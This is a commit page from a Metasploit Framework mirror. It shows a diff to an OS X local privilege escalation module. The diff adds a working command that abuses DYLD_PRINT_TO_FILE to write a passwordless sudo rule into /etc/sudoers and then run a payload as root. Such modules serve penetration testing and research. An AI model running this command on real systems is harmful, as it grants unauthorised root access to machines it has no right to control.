infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove python dependency, add credit URL.

bug/bundler_fix
joev 2015-07-21 22:47:52 -05:00
parent 3013ab4724
commit 165cb195bf
1 changed files with 3 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/osx/local/dlyd_print_to_file_root.rb
View File

@ -25,7 +25,8 @@ class Metasploit4 < Msf::Exploit::Local
'joev' # Copy/paste monkey
],
'References' => [
['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html'],
['URL', 'https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/']
],
'DisclosureDate' => 'Jul 21 2015',
'License' => MSF_LICENSE,
@ -43,7 +44,6 @@ class Metasploit4 < Msf::Exploit::Local
))
register_options([
OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
])
end
@ -69,9 +69,7 @@ class Metasploit4 < Msf::Exploit::Local
end
def sploit
%Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
%Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
%Q|/bin/sh -c 'sudo #{payload_file} &'|
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
end
def binary_payload